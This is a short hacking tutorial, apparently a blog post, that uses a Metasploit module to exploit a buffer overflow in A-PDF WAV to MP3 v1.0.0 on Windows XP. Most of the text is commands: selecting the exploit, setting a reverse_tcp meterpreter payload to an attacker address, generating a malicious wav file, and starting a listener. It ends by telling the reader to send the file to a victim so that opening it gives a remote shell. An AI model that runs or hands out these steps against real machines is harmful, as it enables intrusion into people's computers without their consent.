Categories

Archives

Kali Linux, Penetration Testing

Hack Remote Windows PC Using A-PDF WAV to MP3 v1.0.0 Buffer Overflow

This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution

Exploit Targets

A-PDF WAV to MP3 v1.0.0

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/a-pdf_wav_to_mp3

msf exploit (a-pdf_wav_to_mp3)>set payload windows/meterpreter/reverse_tcp

msf exploit (a-pdf_wav_to_mp3)>set lhost 192.168.0.105 (IP of Local Host)

msf exploit (a-pdf_wav_to_mp3)>exploit

After we successfully generate the malicious wav File, it will stored on your local computer

/root/.msf4/local/msf.wav

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.105

exploit

Now send your msf.wav files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.